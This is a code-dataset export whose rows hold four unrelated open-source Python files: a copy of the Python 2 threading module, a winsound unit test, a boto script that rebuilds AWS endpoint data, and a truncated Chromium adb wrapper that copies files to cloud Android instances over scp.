repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
lightbulb-framework/lightbulb-framework
|
libs/threading.py
|
13
|
31569
|
"""Thread module emulating a subset of Java's threading model."""
import sys as _sys
try:
import thread
except ImportError:
del _sys.modules[__name__]
raise
import warnings
from time import time as _time, sleep as _sleep
from traceback import format_exc as _format_exc
from collections import deque
# Note regarding PEP 8 compliant aliases
# This threading model was originally inspired by Java, and inherited
# the convention of camelCase function and method names from that
# language. While those names are not in any imminent danger of being
# deprecated, starting with Python 2.6, the module now provides a
# PEP 8 compliant alias for any such method name.
# Using the new PEP 8 compliant names also facilitates substitution
# with the multiprocessing module, which doesn't provide the old
# Java inspired names.
# Rename some stuff so "from threading import *" is safe
__all__ = ['activeCount', 'active_count', 'Condition', 'currentThread',
'current_thread', 'enumerate', 'Event',
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Thread',
'Timer', 'setprofile', 'settrace', 'local', 'stack_size']
_start_new_thread = thread.start_new_thread
_allocate_lock = thread.allocate_lock
_get_ident = thread.get_ident
ThreadError = thread.error
del thread
# sys.exc_clear is used to work around the fact that except blocks
# don't fully clear the exception until 3.0.
warnings.filterwarnings('ignore', category=DeprecationWarning,
module='threading', message='sys.exc_clear')
# Debug support (adapted from ihooks.py).
# All the major classes here derive from _Verbose. We force that to
# be a new-style class so that all the major classes here are new-style.
# This helps debugging (type(instance) is more revealing for instances
# of new-style classes).
_VERBOSE = False
if __debug__:
class _Verbose(object):
def __init__(self, verbose=None):
if verbose is None:
verbose = _VERBOSE
self.__verbose = verbose
def _note(self, format, *args):
if self.__verbose:
format = format % args
format = "%s: %s\n" % (
current_thread().name, format)
_sys.stderr.write(format)
else:
# Disable this when using "python -O"
class _Verbose(object):
def __init__(self, verbose=None):
pass
def _note(self, *args):
pass
# Support for profile and trace hooks
_profile_hook = None
_trace_hook = None
def setprofile(func):
global _profile_hook
_profile_hook = func
def settrace(func):
global _trace_hook
_trace_hook = func
# Synchronization classes
Lock = _allocate_lock
def RLock(*args, **kwargs):
return _RLock(*args, **kwargs)
class _RLock(_Verbose):
def __init__(self, verbose=None):
_Verbose.__init__(self, verbose)
self.__block = _allocate_lock()
self.__owner = None
self.__count = 0
def __repr__(self):
owner = self.__owner
try:
owner = _active[owner].name
except KeyError:
pass
return "<%s owner=%r count=%d>" % (
self.__class__.__name__, owner, self.__count)
def acquire(self, blocking=1):
me = _get_ident()
if self.__owner == me:
self.__count = self.__count + 1
if __debug__:
self._note("%s.acquire(%s): recursive success", self, blocking)
return 1
rc = self.__block.acquire(blocking)
if rc:
self.__owner = me
self.__count = 1
if __debug__:
self._note("%s.acquire(%s): initial success", self, blocking)
else:
if __debug__:
self._note("%s.acquire(%s): failure", self, blocking)
return rc
__enter__ = acquire
def release(self):
if self.__owner != _get_ident():
raise RuntimeError("cannot release un-acquired lock")
self.__count = count = self.__count - 1
if not count:
self.__owner = None
self.__block.release()
if __debug__:
self._note("%s.release(): final release", self)
else:
if __debug__:
self._note("%s.release(): non-final release", self)
def __exit__(self, t, v, tb):
self.release()
# Internal methods used by condition variables
def _acquire_restore(self, count_owner):
count, owner = count_owner
self.__block.acquire()
self.__count = count
self.__owner = owner
if __debug__:
self._note("%s._acquire_restore()", self)
def _release_save(self):
if __debug__:
self._note("%s._release_save()", self)
count = self.__count
self.__count = 0
owner = self.__owner
self.__owner = None
self.__block.release()
return (count, owner)
def _is_owned(self):
return self.__owner == _get_ident()
def Condition(*args, **kwargs):
return _Condition(*args, **kwargs)
class _Condition(_Verbose):
def __init__(self, lock=None, verbose=None):
_Verbose.__init__(self, verbose)
if lock is None:
lock = RLock()
self.__lock = lock
# Export the lock's acquire() and release() methods
self.acquire = lock.acquire
self.release = lock.release
# If the lock defines _release_save() and/or _acquire_restore(),
# these override the default implementations (which just call
# release() and acquire() on the lock). Ditto for _is_owned().
try:
self._release_save = lock._release_save
except AttributeError:
pass
try:
self._acquire_restore = lock._acquire_restore
except AttributeError:
pass
try:
self._is_owned = lock._is_owned
except AttributeError:
pass
self.__waiters = []
def __enter__(self):
return self.__lock.__enter__()
def __exit__(self, *args):
return self.__lock.__exit__(*args)
def __repr__(self):
return "<Condition(%s, %d)>" % (self.__lock, len(self.__waiters))
def _release_save(self):
self.__lock.release() # No state to save
def _acquire_restore(self, x):
self.__lock.acquire() # Ignore saved state
def _is_owned(self):
# Return True if lock is owned by current_thread.
# This method is called only if __lock doesn't have _is_owned().
if self.__lock.acquire(0):
self.__lock.release()
return False
else:
return True
def wait(self, timeout=None):
if not self._is_owned():
raise RuntimeError("cannot wait on un-acquired lock")
waiter = _allocate_lock()
waiter.acquire()
self.__waiters.append(waiter)
saved_state = self._release_save()
try: # restore state no matter what (e.g., KeyboardInterrupt)
if timeout is None:
waiter.acquire()
if __debug__:
self._note("%s.wait(): got it", self)
else:
# Balancing act: We can't afford a pure busy loop, so we
# have to sleep; but if we sleep the whole timeout time,
# we'll be unresponsive. The scheme here sleeps very
# little at first, longer as time goes on, but never longer
# than 20 times per second (or the timeout time remaining).
endtime = _time() + timeout
delay = 0.0005 # 500 us -> initial delay of 1 ms
while True:
gotit = waiter.acquire(0)
if gotit:
break
remaining = endtime - _time()
if remaining <= 0:
break
delay = min(delay * 2, remaining, .05)
_sleep(delay)
if not gotit:
if __debug__:
self._note("%s.wait(%s): timed out", self, timeout)
try:
self.__waiters.remove(waiter)
except ValueError:
pass
else:
if __debug__:
self._note("%s.wait(%s): got it", self, timeout)
finally:
self._acquire_restore(saved_state)
def notify(self, n=1):
if not self._is_owned():
raise RuntimeError("cannot notify on un-acquired lock")
__waiters = self.__waiters
waiters = __waiters[:n]
if not waiters:
if __debug__:
self._note("%s.notify(): no waiters", self)
return
self._note("%s.notify(): notifying %d waiter%s", self, n,
n!=1 and "s" or "")
for waiter in waiters:
waiter.release()
try:
__waiters.remove(waiter)
except ValueError:
pass
def notifyAll(self):
self.notify(len(self.__waiters))
notify_all = notifyAll
def Semaphore(*args, **kwargs):
return _Semaphore(*args, **kwargs)
class _Semaphore(_Verbose):
# After Tim Peters' semaphore class, but not quite the same (no maximum)
def __init__(self, value=1, verbose=None):
if value < 0:
raise ValueError("semaphore initial value must be >= 0")
_Verbose.__init__(self, verbose)
self.__cond = Condition(Lock())
self.__value = value
def acquire(self, blocking=1):
rc = False
self.__cond.acquire()
while self.__value == 0:
if not blocking:
break
if __debug__:
self._note("%s.acquire(%s): blocked waiting, value=%s",
self, blocking, self.__value)
self.__cond.wait()
else:
self.__value = self.__value - 1
if __debug__:
self._note("%s.acquire: success, value=%s",
self, self.__value)
rc = True
self.__cond.release()
return rc
__enter__ = acquire
def release(self):
self.__cond.acquire()
self.__value = self.__value + 1
if __debug__:
self._note("%s.release: success, value=%s",
self, self.__value)
self.__cond.notify()
self.__cond.release()
def __exit__(self, t, v, tb):
self.release()
def BoundedSemaphore(*args, **kwargs):
return _BoundedSemaphore(*args, **kwargs)
class _BoundedSemaphore(_Semaphore):
"""Semaphore that checks that # releases is <= # acquires"""
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def release(self):
if self._Semaphore__value >= self._initial_value:
raise ValueError, "Semaphore released too many times"
return _Semaphore.release(self)
def Event(*args, **kwargs):
return _Event(*args, **kwargs)
class _Event(_Verbose):
# After Tim Peters' event class (without is_posted())
def __init__(self, verbose=None):
_Verbose.__init__(self, verbose)
self.__cond = Condition(Lock())
self.__flag = False
def isSet(self):
return self.__flag
is_set = isSet
def set(self):
self.__cond.acquire()
try:
self.__flag = True
self.__cond.notify_all()
finally:
self.__cond.release()
def clear(self):
self.__cond.acquire()
try:
self.__flag = False
finally:
self.__cond.release()
def wait(self, timeout=None):
self.__cond.acquire()
try:
if not self.__flag:
self.__cond.wait(timeout)
return self.__flag
finally:
self.__cond.release()
# Helper to generate new thread names
_counter = 0
def _newname(template="Thread-%d"):
global _counter
_counter = _counter + 1
return template % _counter
# Active thread administration
_active_limbo_lock = _allocate_lock()
_active = {} # maps thread id to Thread object
_limbo = {}
# Main class for threads
class Thread(_Verbose):
__initialized = False
# Need to store a reference to sys.exc_info for printing
# out exceptions when a thread tries to use a global var. during interp.
# shutdown and thus raises an exception about trying to perform some
# operation on/with a NoneType
__exc_info = _sys.exc_info
# Keep sys.exc_clear too to clear the exception just before
# allowing .join() to return.
__exc_clear = _sys.exc_clear
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None, verbose=None):
assert group is None, "group argument must be None for now"
_Verbose.__init__(self, verbose)
if kwargs is None:
kwargs = {}
self.__target = target
self.__name = str(name or _newname())
self.__args = args
self.__kwargs = kwargs
self.__daemonic = self._set_daemon()
self.__ident = None
self.__started = Event()
self.__stopped = False
self.__block = Condition(Lock())
self.__initialized = True
# sys.stderr is not stored in the class like
# sys.exc_info since it can be changed between instances
self.__stderr = _sys.stderr
def _set_daemon(self):
# Overridden in _MainThread and _DummyThread
return current_thread().daemon
def __repr__(self):
assert self.__initialized, "Thread.__init__() was not called"
status = "initial"
if self.__started.is_set():
status = "started"
if self.__stopped:
status = "stopped"
if self.__daemonic:
status += " daemon"
if self.__ident is not None:
status += " %s" % self.__ident
return "<%s(%s, %s)>" % (self.__class__.__name__, self.__name, status)
def start(self):
if not self.__initialized:
raise RuntimeError("thread.__init__() not called")
if self.__started.is_set():
raise RuntimeError("threads can only be started once")
if __debug__:
self._note("%s.start(): starting thread", self)
with _active_limbo_lock:
_limbo[self] = self
try:
_start_new_thread(self.__bootstrap, ())
except Exception:
with _active_limbo_lock:
del _limbo[self]
raise
self.__started.wait()
def run(self):
try:
if self.__target:
self.__target(*self.__args, **self.__kwargs)
finally:
# Avoid a refcycle if the thread is running a function with
# an argument that has a member that points to the thread.
del self.__target, self.__args, self.__kwargs
def __bootstrap(self):
# Wrapper around the real bootstrap code that ignores
# exceptions during interpreter cleanup. Those typically
# happen when a daemon thread wakes up at an unfortunate
# moment, finds the world around it destroyed, and raises some
# random exception *** while trying to report the exception in
# __bootstrap_inner() below ***. Those random exceptions
# don't help anybody, and they confuse users, so we suppress
# them. We suppress them only when it appears that the world
# indeed has already been destroyed, so that exceptions in
# __bootstrap_inner() during normal business hours are properly
# reported. Also, we only suppress them for daemonic threads;
# if a non-daemonic encounters this, something else is wrong.
try:
self.__bootstrap_inner()
except:
if self.__daemonic and _sys is None:
return
raise
def _set_ident(self):
self.__ident = _get_ident()
def __bootstrap_inner(self):
try:
self._set_ident()
self.__started.set()
with _active_limbo_lock:
_active[self.__ident] = self
del _limbo[self]
if __debug__:
self._note("%s.__bootstrap(): thread started", self)
if _trace_hook:
self._note("%s.__bootstrap(): registering trace hook", self)
_sys.settrace(_trace_hook)
if _profile_hook:
self._note("%s.__bootstrap(): registering profile hook", self)
_sys.setprofile(_profile_hook)
try:
self.run()
except SystemExit:
if __debug__:
self._note("%s.__bootstrap(): raised SystemExit", self)
except:
if __debug__:
self._note("%s.__bootstrap(): unhandled exception", self)
# If sys.stderr is no more (most likely from interpreter
# shutdown) use self.__stderr. Otherwise still use sys (as in
# _sys) in case sys.stderr was redefined since the creation of
# self.
if _sys:
_sys.stderr.write("Exception in thread %s:\n%s\n" %
(self.name, _format_exc()))
else:
# Do the best job possible w/o a huge amt. of code to
# approximate a traceback (code ideas from
# Lib/traceback.py)
exc_type, exc_value, exc_tb = self.__exc_info()
try:
print>>self.__stderr, (
"Exception in thread " + self.name +
" (most likely raised during interpreter shutdown):")
print>>self.__stderr, (
"Traceback (most recent call last):")
while exc_tb:
print>>self.__stderr, (
' File "%s", line %s, in %s' %
(exc_tb.tb_frame.f_code.co_filename,
exc_tb.tb_lineno,
exc_tb.tb_frame.f_code.co_name))
exc_tb = exc_tb.tb_next
print>>self.__stderr, ("%s: %s" % (exc_type, exc_value))
# Make sure that exc_tb gets deleted since it is a memory
# hog; deleting everything else is just for thoroughness
finally:
del exc_type, exc_value, exc_tb
else:
if __debug__:
self._note("%s.__bootstrap(): normal return", self)
finally:
# Prevent a race in
# test_threading.test_no_refcycle_through_target when
# the exception keeps the target alive past when we
# assert that it's dead.
self.__exc_clear()
finally:
with _active_limbo_lock:
self.__stop()
try:
# We don't call self.__delete() because it also
# grabs _active_limbo_lock.
del _active[_get_ident()]
except:
pass
def __stop(self):
self.__block.acquire()
self.__stopped = True
self.__block.notify_all()
self.__block.release()
def __delete(self):
"Remove current thread from the dict of currently running threads."
# Notes about running with dummy_thread:
#
# Must take care to not raise an exception if dummy_thread is being
# used (and thus this module is being used as an instance of
# dummy_threading). dummy_thread.get_ident() always returns -1 since
# there is only one thread if dummy_thread is being used. Thus
# len(_active) is always <= 1 here, and any Thread instance created
# overwrites the (if any) thread currently registered in _active.
#
# An instance of _MainThread is always created by 'threading'. This
# gets overwritten the instant an instance of Thread is created; both
# threads return -1 from dummy_thread.get_ident() and thus have the
# same key in the dict. So when the _MainThread instance created by
# 'threading' tries to clean itself up when atexit calls this method
# it gets a KeyError if another Thread instance was created.
#
# This all means that KeyError from trying to delete something from
# _active if dummy_threading is being used is a red herring. But
# since it isn't if dummy_threading is *not* being used then don't
# hide the exception.
try:
with _active_limbo_lock:
del _active[_get_ident()]
# There must not be any python code between the previous line
# and after the lock is released. Otherwise a tracing function
# could try to acquire the lock again in the same thread, (in
# current_thread()), and would block.
except KeyError:
if 'dummy_threading' not in _sys.modules:
raise
def join(self, timeout=None):
if not self.__initialized:
raise RuntimeError("Thread.__init__() not called")
if not self.__started.is_set():
raise RuntimeError("cannot join thread before it is started")
if self is current_thread():
raise RuntimeError("cannot join current thread")
if __debug__:
if not self.__stopped:
self._note("%s.join(): waiting until thread stops", self)
self.__block.acquire()
try:
if timeout is None:
while not self.__stopped:
self.__block.wait()
if __debug__:
self._note("%s.join(): thread stopped", self)
else:
deadline = _time() + timeout
while not self.__stopped:
delay = deadline - _time()
if delay <= 0:
if __debug__:
self._note("%s.join(): timed out", self)
break
self.__block.wait(delay)
else:
if __debug__:
self._note("%s.join(): thread stopped", self)
finally:
self.__block.release()
@property
def name(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__name
@name.setter
def name(self, name):
assert self.__initialized, "Thread.__init__() not called"
self.__name = str(name)
@property
def ident(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__ident
def isAlive(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__started.is_set() and not self.__stopped
is_alive = isAlive
@property
def daemon(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__daemonic
@daemon.setter
def daemon(self, daemonic):
if not self.__initialized:
raise RuntimeError("Thread.__init__() not called")
if self.__started.is_set():
raise RuntimeError("cannot set daemon status of active thread");
self.__daemonic = daemonic
def isDaemon(self):
return self.daemon
def setDaemon(self, daemonic):
self.daemon = daemonic
def getName(self):
return self.name
def setName(self, name):
self.name = name
# The timer class was contributed by Itamar Shtull-Trauring
def Timer(*args, **kwargs):
return _Timer(*args, **kwargs)
class _Timer(Thread):
"""Call a function after a specified number of seconds:
t = Timer(30.0, f, args=[], kwargs={})
t.start()
t.cancel() # stop the timer's action if it's still waiting
"""
def __init__(self, interval, function, args=[], kwargs={}):
Thread.__init__(self)
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.finished = Event()
def cancel(self):
"""Stop the timer if it hasn't finished yet"""
self.finished.set()
def run(self):
self.finished.wait(self.interval)
if not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.set()
# Special thread class to represent the main thread
# This is garbage collected through an exit handler
class _MainThread(Thread):
def __init__(self):
Thread.__init__(self, name="MainThread")
self._Thread__started.set()
self._set_ident()
with _active_limbo_lock:
_active[_get_ident()] = self
def _set_daemon(self):
return False
def _exitfunc(self):
self._Thread__stop()
t = _pickSomeNonDaemonThread()
if t:
if __debug__:
self._note("%s: waiting for other threads", self)
while t:
t.join()
t = _pickSomeNonDaemonThread()
if __debug__:
self._note("%s: exiting", self)
self._Thread__delete()
def _pickSomeNonDaemonThread():
for t in enumerate():
if not t.daemon and t.is_alive():
return t
return None
# Dummy thread class to represent threads not started here.
# These aren't garbage collected when they die, nor can they be waited for.
# If they invoke anything in threading.py that calls current_thread(), they
# leave an entry in the _active dict forever after.
# Their purpose is to return *something* from current_thread().
# They are marked as daemon threads so we won't wait for them
# when we exit (conform previous semantics).
class _DummyThread(Thread):
def __init__(self):
Thread.__init__(self, name=_newname("Dummy-%d"))
# Thread.__block consumes an OS-level locking primitive, which
# can never be used by a _DummyThread. Since a _DummyThread
# instance is immortal, that's bad, so release this resource.
del self._Thread__block
self._Thread__started.set()
self._set_ident()
with _active_limbo_lock:
_active[_get_ident()] = self
def _set_daemon(self):
return True
def join(self, timeout=None):
assert False, "cannot join a dummy thread"
# Global API functions
def currentThread():
try:
return _active[_get_ident()]
except KeyError:
##print "current_thread(): no current thread for", _get_ident()
return _DummyThread()
current_thread = currentThread
def activeCount():
with _active_limbo_lock:
return len(_active) + len(_limbo)
active_count = activeCount
def _enumerate():
# Same as enumerate(), but without the lock. Internal use only.
return _active.values() + _limbo.values()
def enumerate():
with _active_limbo_lock:
return _active.values() + _limbo.values()
from thread import stack_size
# Create the main thread object,
# and make it available for the interpreter
# (Py_Main) as threading._shutdown.
_shutdown = _MainThread()._exitfunc
# get thread-local implementation, either from the thread
# module, or from the python fallback
try:
from thread import _local as local
except ImportError:
from _threading_local import local
def _after_fork():
# This function is called by Python/ceval.c:PyEval_ReInitThreads which
# is called from PyOS_AfterFork. Here we cleanup threading module state
# that should not exist after a fork.
# Reset _active_limbo_lock, in case we forked while the lock was held
# by another (non-forked) thread. http://bugs.python.org/issue874900
global _active_limbo_lock
_active_limbo_lock = _allocate_lock()
# fork() only copied the current thread; clear references to others.
new_active = {}
current = current_thread()
with _active_limbo_lock:
for thread in _active.itervalues():
if thread is current:
# There is only one active thread. We reset the ident to
# its new value since it can have changed.
ident = _get_ident()
thread._Thread__ident = ident
new_active[ident] = thread
else:
# All the others are already stopped.
# We don't call _Thread__stop() because it tries to acquire
# thread._Thread__block which could also have been held while
# we forked.
thread._Thread__stopped = True
_limbo.clear()
_active.clear()
_active.update(new_active)
assert len(_active) == 1
# Self-test code
def _test():
class BoundedQueue(_Verbose):
def __init__(self, limit):
_Verbose.__init__(self)
self.mon = RLock()
self.rc = Condition(self.mon)
self.wc = Condition(self.mon)
self.limit = limit
self.queue = deque()
def put(self, item):
self.mon.acquire()
while len(self.queue) >= self.limit:
self._note("put(%s): queue full", item)
self.wc.wait()
self.queue.append(item)
self._note("put(%s): appended, length now %d",
item, len(self.queue))
self.rc.notify()
self.mon.release()
def get(self):
self.mon.acquire()
while not self.queue:
self._note("get(): queue empty")
self.rc.wait()
item = self.queue.popleft()
self._note("get(): got %s, %d left", item, len(self.queue))
self.wc.notify()
self.mon.release()
return item
class ProducerThread(Thread):
def __init__(self, queue, quota):
Thread.__init__(self, name="Producer")
self.queue = queue
self.quota = quota
def run(self):
from random import random
counter = 0
while counter < self.quota:
counter = counter + 1
self.queue.put("%s.%d" % (self.name, counter))
_sleep(random() * 0.00001)
class ConsumerThread(Thread):
def __init__(self, queue, count):
Thread.__init__(self, name="Consumer")
self.queue = queue
self.count = count
def run(self):
while self.count > 0:
item = self.queue.get()
print item
self.count = self.count - 1
NP = 3
QL = 4
NI = 5
Q = BoundedQueue(QL)
P = []
for i in range(NP):
t = ProducerThread(Q, NI)
t.name = ("Producer-%d" % (i+1))
P.append(t)
C = ConsumerThread(Q, NI*NP)
for t in P:
t.start()
_sleep(0.000001)
C.start()
for t in P:
t.join()
C.join()
if __name__ == '__main__':
_test()
|
mit
|
mancoast/CPythonPyc_test
|
fail/335_test_winsound.py
|
4
|
9075
|
# Ridiculously simple test of the winsound module for Windows.
import unittest
from test import support
support.requires('audio')
import time
import os
import subprocess
winsound = support.import_module('winsound')
ctypes = support.import_module('ctypes')
import winreg
def has_sound(sound):
"""Find out if a particular event is configured with a default sound"""
try:
# Ask the mixer API for the number of devices it knows about.
# When there are no devices, PlaySound will fail.
if ctypes.windll.winmm.mixerGetNumDevs() == 0:
return False
key = winreg.OpenKeyEx(winreg.HKEY_CURRENT_USER,
"AppEvents\Schemes\Apps\.Default\{0}\.Default".format(sound))
return winreg.EnumValue(key, 0)[1] != ""
except WindowsError:
return False
class BeepTest(unittest.TestCase):
# As with PlaySoundTest, incorporate the _have_soundcard() check
# into our test methods. If there's no audio device present,
# winsound.Beep returns 0 and GetLastError() returns 127, which
# is: ERROR_PROC_NOT_FOUND ("The specified procedure could not
# be found"). (FWIW, virtual/Hyper-V systems fall under this
# scenario as they have no sound devices whatsoever (not even
# a legacy Beep device).)
def test_errors(self):
self.assertRaises(TypeError, winsound.Beep)
self.assertRaises(ValueError, winsound.Beep, 36, 75)
self.assertRaises(ValueError, winsound.Beep, 32768, 75)
def test_extremes(self):
self._beep(37, 75)
self._beep(32767, 75)
def test_increasingfrequency(self):
for i in range(100, 2000, 100):
self._beep(i, 75)
def _beep(self, *args):
# these tests used to use _have_soundcard(), but it's quite
# possible to have a soundcard, and yet have the beep driver
# disabled. So basically, we have no way of knowing whether
# a beep should be produced or not, so currently if these
# tests fail we're ignoring them
#
# XXX the right fix for this is to define something like
# _have_enabled_beep_driver() and use that instead of the
# try/except below
try:
winsound.Beep(*args)
except RuntimeError:
pass
class MessageBeepTest(unittest.TestCase):
def tearDown(self):
time.sleep(0.5)
def test_default(self):
self.assertRaises(TypeError, winsound.MessageBeep, "bad")
self.assertRaises(TypeError, winsound.MessageBeep, 42, 42)
winsound.MessageBeep()
def test_ok(self):
winsound.MessageBeep(winsound.MB_OK)
def test_asterisk(self):
winsound.MessageBeep(winsound.MB_ICONASTERISK)
def test_exclamation(self):
winsound.MessageBeep(winsound.MB_ICONEXCLAMATION)
def test_hand(self):
winsound.MessageBeep(winsound.MB_ICONHAND)
def test_question(self):
winsound.MessageBeep(winsound.MB_ICONQUESTION)
class PlaySoundTest(unittest.TestCase):
def test_errors(self):
self.assertRaises(TypeError, winsound.PlaySound)
self.assertRaises(TypeError, winsound.PlaySound, "bad", "bad")
self.assertRaises(
RuntimeError,
winsound.PlaySound,
"none", winsound.SND_ASYNC | winsound.SND_MEMORY
)
@unittest.skipUnless(has_sound("SystemAsterisk"),
"No default SystemAsterisk")
def test_alias_asterisk(self):
if _have_soundcard():
winsound.PlaySound('SystemAsterisk', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemAsterisk', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemExclamation"),
"No default SystemExclamation")
def test_alias_exclamation(self):
if _have_soundcard():
winsound.PlaySound('SystemExclamation', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemExclamation', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemExit"), "No default SystemExit")
def test_alias_exit(self):
if _have_soundcard():
winsound.PlaySound('SystemExit', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemExit', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemHand"), "No default SystemHand")
def test_alias_hand(self):
if _have_soundcard():
winsound.PlaySound('SystemHand', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemHand', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemQuestion"),
"No default SystemQuestion")
def test_alias_question(self):
if _have_soundcard():
winsound.PlaySound('SystemQuestion', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemQuestion', winsound.SND_ALIAS
)
def test_alias_fallback(self):
# In the absense of the ability to tell if a sound was actually
# played, this test has two acceptable outcomes: success (no error,
# sound was theoretically played; although as issue #19987 shows
# a box without a soundcard can "succeed") or RuntimeError. Any
# other error is a failure.
try:
winsound.PlaySound('!"$%&/(#+*', winsound.SND_ALIAS)
except RuntimeError:
pass
def test_alias_nofallback(self):
if _have_soundcard():
# Note that this is not the same as asserting RuntimeError
# will get raised: you cannot convert this to
# self.assertRaises(...) form. The attempt may or may not
# raise RuntimeError, but it shouldn't raise anything other
# than RuntimeError, and that's all we're trying to test
# here. The MS docs aren't clear about whether the SDK
# PlaySound() with SND_ALIAS and SND_NODEFAULT will return
# True or False when the alias is unknown. On Tim's WinXP
# box today, it returns True (no exception is raised). What
# we'd really like to test is that no sound is played, but
# that requires first wiring an eardrum class into unittest
# <wink>.
try:
winsound.PlaySound(
'!"$%&/(#+*',
winsound.SND_ALIAS | winsound.SND_NODEFAULT
)
except RuntimeError:
pass
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'!"$%&/(#+*', winsound.SND_ALIAS | winsound.SND_NODEFAULT
)
def test_stopasync(self):
if _have_soundcard():
winsound.PlaySound(
'SystemQuestion',
winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP
)
time.sleep(0.5)
try:
winsound.PlaySound(
'SystemQuestion',
winsound.SND_ALIAS | winsound.SND_NOSTOP
)
except RuntimeError:
pass
else: # the first sound might already be finished
pass
winsound.PlaySound(None, winsound.SND_PURGE)
else:
# Issue 8367: PlaySound(None, winsound.SND_PURGE)
# does not raise on systems without a sound card.
pass
def _get_cscript_path():
"""Return the full path to cscript.exe or None."""
for dir in os.environ.get("PATH", "").split(os.pathsep):
cscript_path = os.path.join(dir, "cscript.exe")
if os.path.exists(cscript_path):
return cscript_path
__have_soundcard_cache = None
def _have_soundcard():
"""Return True iff this computer has a soundcard."""
global __have_soundcard_cache
if __have_soundcard_cache is None:
cscript_path = _get_cscript_path()
if cscript_path is None:
# Could not find cscript.exe to run our VBScript helper. Default
# to True: most computers these days *do* have a soundcard.
return True
check_script = os.path.join(os.path.dirname(__file__),
"check_soundcard.vbs")
p = subprocess.Popen([cscript_path, check_script],
stdout=subprocess.PIPE)
__have_soundcard_cache = not p.wait()
p.stdout.close()
return __have_soundcard_cache
def test_main():
support.run_unittest(BeepTest, MessageBeepTest, PlaySoundTest)
if __name__=="__main__":
test_main()
|
gpl-3.0
|
ramitsurana/boto
|
scripts/rebuild_endpoints.py
|
79
|
1281
|
import json
from pyquery import PyQuery as pq
import requests
class FetchError(Exception):
pass
def fetch_endpoints():
# We utilize what the Java SDK publishes as a baseline.
resp = requests.get('https://raw2.github.com/aws/aws-sdk-java/master/src/main/resources/etc/regions.xml')
if int(resp.status_code) != 200:
raise FetchError("Failed to fetch the endpoints. Got {0}: {1}".format(
resp.status,
resp.body
))
return resp.text
def parse_xml(raw_xml):
return pq(raw_xml, parser='xml')
def build_data(doc):
data = {}
# Run through all the regions. These have all the data we need.
for region_elem in doc('Regions').find('Region'):
region = pq(region_elem, parser='xml')
region_name = region.find('Name').text()
for endp in region.find('Endpoint'):
service_name = endp.find('ServiceName').text
endpoint = endp.find('Hostname').text
data.setdefault(service_name, {})
data[service_name][region_name] = endpoint
return data
def main():
raw_xml = fetch_endpoints()
doc = parse_xml(raw_xml)
data = build_data(doc)
print(json.dumps(data, indent=4, sort_keys=True))
if __name__ == '__main__':
main()
|
mit
|
eval1749/elang
|
build/android/devil/android/sdk/gce_adb_wrapper.py
|
12
|
4853
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides a work around for various adb commands on android gce instances.
Some adb commands don't work well when the device is a cloud vm, namely
'push' and 'pull'. With gce instances, moving files through adb can be
painfully slow and hit timeouts, so the methods here just use scp instead.
"""
# pylint: disable=unused-argument
import logging
import os
import subprocess
from devil.android import device_errors
from devil.android.sdk import adb_wrapper
from devil.utils import cmd_helper
# SSH key file for accessing the instances. The keys are created at
# startup and removed & revoked at teardown.
_SSH_KEY_FILE = '/tmp/ssh_android_gce_instance'
class GceAdbWrapper(adb_wrapper.AdbWrapper):
def __init__(self, device_serial):
super(GceAdbWrapper, self).__init__(device_serial)
self._instance_ip = self.Shell('getprop net.gce.ip_address').strip()
#override
def Push(self, local, remote, **kwargs):
"""Pushes an object from the host to the gce instance.
Args:
local: Path on the host filesystem.
remote: Path on the instance filesystem.
"""
adb_wrapper.VerifyLocalFileExists(_SSH_KEY_FILE)
adb_wrapper.VerifyLocalFileExists(local)
if os.path.isdir(local):
self.Shell('mkdir -p %s' % cmd_helper.SingleQuote(remote))
# When the object to be pushed is a directory, adb merges the source dir
# with the destination dir. So if local is a dir, just scp its contents.
for f in os.listdir(local):
self._PushObject(os.path.join(local, f), os.path.join(remote, f))
self.Shell('chmod 777 %s' %
cmd_helper.SingleQuote(os.path.join(remote, f)))
else:
parent_dir = remote[0:remote.rfind('/')]
if parent_dir:
self.Shell('mkdir -p %s' % cmd_helper.SingleQuote(parent_dir))
self._PushObject(local, remote)
self.Shell('chmod 777 %s' % cmd_helper.SingleQuote(remote))
def _PushObject(self, local, remote):
"""Copies an object from the host to the gce instance using scp.
Args:
local: Path on the host filesystem.
remote: Path on the instance filesystem.
"""
cmd = [
'scp',
'-r',
'-i', _SSH_KEY_FILE,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
local,
'root@%s:%s' % (self._instance_ip, remote)
]
status, _ = cmd_helper.GetCmdStatusAndOutput(cmd)
if status:
raise device_errors.AdbCommandFailedError(
cmd, 'File not reachable on host: %s' % local,
device_serial=str(self))
#override
def Pull(self, remote, local, **kwargs):
"""Pulls a file from the gce instance to the host.
Args:
remote: Path on the instance filesystem.
local: Path on the host filesystem.
"""
adb_wrapper.VerifyLocalFileExists(_SSH_KEY_FILE)
cmd = [
'scp',
'-p',
'-r',
'-i', _SSH_KEY_FILE,
